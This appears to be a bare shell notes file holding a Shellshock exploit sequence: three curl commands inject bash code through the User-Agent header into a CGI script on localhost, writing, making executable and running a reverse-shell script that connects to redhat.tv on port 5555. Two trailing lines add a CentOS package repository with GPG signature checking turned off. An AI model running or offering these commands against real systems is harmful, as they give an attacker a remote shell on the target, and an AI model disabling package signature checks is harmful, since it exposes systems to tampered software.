curl -A "() { :; }; echo \"Content-type: text/plain\"; echo; echo 'bash -i >& /dev/tcp/redhat.tv/5555 0>&1' > /tmp/revers.sh" localhost:5566/cgi-bin/app.cgi

curl -A "() { :; }; echo \"Content-type: text/plain\"; echo; /usr/bin/chmod +x /tmp/revers.sh" localhost:5566/cgi-bin/app.cgi

curl -A "() { :; }; echo \"Content-type: text/plain\"; echo; /tmp/revers.sh" localhost:5566/cgi-bin/app.cgi


yum-config-manager --add-repo="http://mirror.centos.org/centos/7/os/x86_64/" --nogpgcheck

echo "gpgcheck=0" >> mirror.centos.org_centos_7_os_x86_64_.repo

~                                                                               
~                                                                               

